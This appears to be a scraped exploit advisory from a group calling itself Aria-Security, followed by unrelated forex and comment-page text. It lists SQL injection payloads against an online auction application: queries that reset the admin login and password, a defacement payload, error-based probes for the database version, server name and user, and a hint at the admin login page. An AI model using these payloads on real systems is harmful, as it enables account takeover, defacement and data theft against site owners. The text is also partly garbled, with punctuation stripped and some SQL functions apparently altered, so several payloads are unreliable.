Aria-Security Teamhttp://Aria-Security. Net------------------------------------------Original Advisory @ http://aria-security net/forum/showthread php?p=1111Try it online @ http://ads netauctionhelp comneeded tables:tblMember idtblMember logintblMember pswdVulnarable Page: Login aspRun this query for Forget Password-1' UPDATE tblMember Set login= 'admin' where(id='1');---1' modify tblMember set pswd= 'hacked' Where(id= '1');--there it is admin with the password hacked------------------------------------------------------------------------------------these may back up the attacker to get more info in the examine asp page/search asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]tblAd id,tblAd imagepath,tblAd aspectratio,tblAd t itle,tblAd zip,tblAd state,tblAd startdate'example: -1' update tblAd set call= 'hacked' where(id='1');--site com/addetl asp?id=1 will say HACKED.1' or 1=alter(int,@@version)--1' or 1=alter(int,@@servername)--1' or 1=alter(int,db_label())--1' or 1=convert(int,user_name())--1' or 1=alter(int,system_user)--hint: /auctionAdmin/admLogin asp ;)Greetz: AurACredits goes to Aria-Security TeamRegards,The-0utl4w
Forex Groups - Tips on Trading
Related article:
http://www.securityfocus.com/archive/1/484158
comments | Add comment | Report as Spam
|